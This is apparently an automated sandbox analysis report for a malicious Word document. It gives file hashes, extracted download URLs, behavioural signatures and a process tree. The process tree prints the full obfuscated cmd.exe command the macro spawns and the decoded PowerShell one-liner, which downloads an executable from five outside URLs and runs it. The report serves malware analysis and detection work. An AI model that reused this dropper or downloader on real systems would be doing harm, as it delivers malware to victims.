Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
140s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
09/05/2024, 18:36
Behavioral task
behavioral1
Sample
2b55fd8225bbb246505b3977b3f9a771_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
2b55fd8225bbb246505b3977b3f9a771_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
2b55fd8225bbb246505b3977b3f9a771_JaffaCakes118.doc
-
Size
87KB
-
MD5
2b55fd8225bbb246505b3977b3f9a771
-
SHA1
69011ee374a24aaf95d295dfcc1caf7e40134116
-
SHA256
c5062955b084ce13e9c6dcf285f4d664554b3f71de1e35af8238d2f717bb8863
-
SHA512
465d673ffba4ed16b4d1d64eba50ef2b4ddb7d27c8d0aece9f8a61b2b8dc166e26f31d741b84c18fac9f327a7d5190e37d0c6d10571d5fe285321ec77bae467f
-
SSDEEP
1536:07ljmW9/bvF8kDK3cvyQa2E1XFjmCaIH84G+a9:Wl/bvF8OnaJ1XtxaIH84
Malware Config
Extracted
http://www.ozturcanakkale.com/veh
http://jalvarshaborewell.com/qKkg
http://kikakeus.nl/dgc0WYq9
http://pashkinbar.ru/cWGU
http://cisteni-studni.com/qb1Y2
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3660 3580 cmd.exe 81 -
Blocklisted process makes network request 6 IoCs
flow pid Process 38 3180 powershell.exe 102 3180 powershell.exe 104 3180 powershell.exe 107 3180 powershell.exe 109 3180 powershell.exe 110 3180 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3580 WINWORD.EXE 3580 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3180 powershell.exe 3180 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3180 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3580 WINWORD.EXE 3580 WINWORD.EXE 3580 WINWORD.EXE 3580 WINWORD.EXE 3580 WINWORD.EXE 3580 WINWORD.EXE 3580 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3580 wrote to memory of 4648 3580 WINWORD.EXE 85 PID 3580 wrote to memory of 4648 3580 WINWORD.EXE 85 PID 3580 wrote to memory of 3660 3580 WINWORD.EXE 87 PID 3580 wrote to memory of 3660 3580 WINWORD.EXE 87 PID 3660 wrote to memory of 2332 3660 cmd.exe 89 PID 3660 wrote to memory of 2332 3660 cmd.exe 89 PID 2332 wrote to memory of 3180 2332 cmd.exe 93 PID 2332 wrote to memory of 3180 2332 cmd.exe 93
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2b55fd8225bbb246505b3977b3f9a771_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:4648
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set KMg=JFCiSsmEtbJWtDAbWLcuqRKwifdqXjZOT=)B9Mz8H{Ie1}-v.lxyU\'rY:g (20$,@6;+akGhNop/n&&for %u in (63;30;74;70;33;54;26;29;49;54;67;63;37;75;5;33;77;43;23;46;74;15;29;43;18;12;59;73;43;12;48;16;43;15;2;49;24;43;77;12;67;63;4;77;29;33;54;72;12;12;75;57;76;76;23;23;23;48;74;38;12;19;55;18;69;77;69;70;70;69;49;43;48;18;74;6;76;47;43;72;65;72;12;12;75;57;76;76;29;69;49;47;69;55;5;72;69;15;74;55;43;23;43;49;49;48;18;74;6;76;27;22;70;58;65;72;12;12;75;57;76;76;70;24;70;69;70;43;19;5;48;77;49;76;26;58;18;62;16;56;27;36;65;72;12;12;75;57;76;76;75;69;5;72;70;24;77;15;69;55;48;55;19;76;18;16;71;52;65;72;12;12;75;57;76;76;18;24;5;12;43;77;24;46;5;12;19;26;77;24;48;18;74;6;76;27;15;44;56;61;54;48;4;75;49;24;12;60;54;65;54;34;67;63;49;69;12;33;54;1;24;10;54;67;63;70;73;72;59;33;59;54;61;36;66;54;67;63;21;37;32;33;54;70;40;23;54;67;63;5;25;47;33;63;43;77;47;57;12;43;6;75;68;54;53;54;68;63;70;73;72;68;54;48;43;50;43;54;67;25;74;55;43;69;18;72;60;63;26;23;23;59;24;77;59;63;4;77;29;34;41;12;55;51;41;63;37;75;5;48;13;74;23;77;49;74;69;26;1;24;49;43;60;63;26;23;23;64;59;63;5;25;47;34;67;63;17;70;31;33;54;24;19;16;54;67;42;25;59;60;60;71;43;12;46;42;12;43;6;59;63;5;25;47;34;48;49;43;77;58;12;72;59;46;58;43;59;39;62;62;62;62;34;59;41;42;77;47;74;70;43;46;42;12;43;6;59;63;5;25;47;67;63;32;70;28;33;54;73;31;24;54;67;15;55;43;69;70;67;45;45;18;69;12;18;72;41;45;45;63;6;23;13;33;54;38;35;73;54;67;79)do set LqCa=!LqCa!!KMg:~%u,1!&&if %u gtr 78 powershell "!LqCa:~-440!""2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\system32\cmd.exeCmD /V:/C"set KMg=JFCiSsmEtbJWtDAbWLcuqRKwifdqXjZOT=)B9Mz8H{Ie1}-v.lxyU\'rY:g (20$,@6;+akGhNop/n&&for %u in (63;30;74;70;33;54;26;29;49;54;67;63;37;75;5;33;77;43;23;46;74;15;29;43;18;12;59;73;43;12;48;16;43;15;2;49;24;43;77;12;67;63;4;77;29;33;54;72;12;12;75;57;76;76;23;23;23;48;74;38;12;19;55;18;69;77;69;70;70;69;49;43;48;18;74;6;76;47;43;72;65;72;12;12;75;57;76;76;29;69;49;47;69;55;5;72;69;15;74;55;43;23;43;49;49;48;18;74;6;76;27;22;70;58;65;72;12;12;75;57;76;76;70;24;70;69;70;43;19;5;48;77;49;76;26;58;18;62;16;56;27;36;65;72;12;12;75;57;76;76;75;69;5;72;70;24;77;15;69;55;48;55;19;76;18;16;71;52;65;72;12;12;75;57;76;76;18;24;5;12;43;77;24;46;5;12;19;26;77;24;48;18;74;6;76;27;15;44;56;61;54;48;4;75;49;24;12;60;54;65;54;34;67;63;49;69;12;33;54;1;24;10;54;67;63;70;73;72;59;33;59;54;61;36;66;54;67;63;21;37;32;33;54;70;40;23;54;67;63;5;25;47;33;63;43;77;47;57;12;43;6;75;68;54;53;54;68;63;70;73;72;68;54;48;43;50;43;54;67;25;74;55;43;69;18;72;60;63;26;23;23;59;24;77;59;63;4;77;29;34;41;12;55;51;41;63;37;75;5;48;13;74;23;77;49;74;69;26;1;24;49;43;60;63;26;23;23;64;59;63;5;25;47;34;67;63;17;70;31;33;54;24;19;16;54;67;42;25;59;60;60;71;43;12;46;42;12;43;6;59;63;5;25;47;34;48;49;43;77;58;12;72;59;46;58;43;59;39;62;62;62;62;34;59;41;42;77;47;74;70;43;46;42;12;43;6;59;63;5;25;47;67;63;32;70;28;33;54;73;31;24;54;67;15;55;43;69;70;67;45;45;18;69;12;18;72;41;45;45;63;6;23;13;33;54;38;35;73;54;67;79)do set LqCa=!LqCa!!KMg:~%u,1!&&if %u gtr 78 powershell "!LqCa:~-440!""3⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$Zok='djl';$Mps=new-object Net.WebClient;$Snj='http://www.ozturcanakkale.com/veh@http://jalvarshaborewell.com/qKkg@http://kikakeus.nl/dgc0WYq9@http://pashkinbar.ru/cWGU@http://cisteni-studni.com/qb1Y2'.Split('@');$lat='FiJ';$kNh = '296';$RMT='kHw';$sfv=$env:temp+'\'+$kNh+'.exe';foreach($dww in $Snj){try{$Mps.DownloadFile($dww, $sfv);$LkO='iuW';If ((Get-Item $sfv).length -ge 80000) {Invoke-Item $sfv;$TkX='NOi';break;}}catch{}}$mwD='zBN';"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3180
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
512B
MD530cc567437660f01a32b67a1026fa715
SHA1808ac4d2971b98f19f2192de939b2e3b5d742255
SHA2563678b6b3fee8701743e2f633fc18a0e03282bc63bd8a559d34ede471ff512f86
SHA512c4f5cc25e436d94f84c49b1732cf2fe2979e3a5dea8deb0ec386483052165df732ada45680cfc86a29778a3dc3642401491ba8cdbc671b18f03639bd839caa96
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82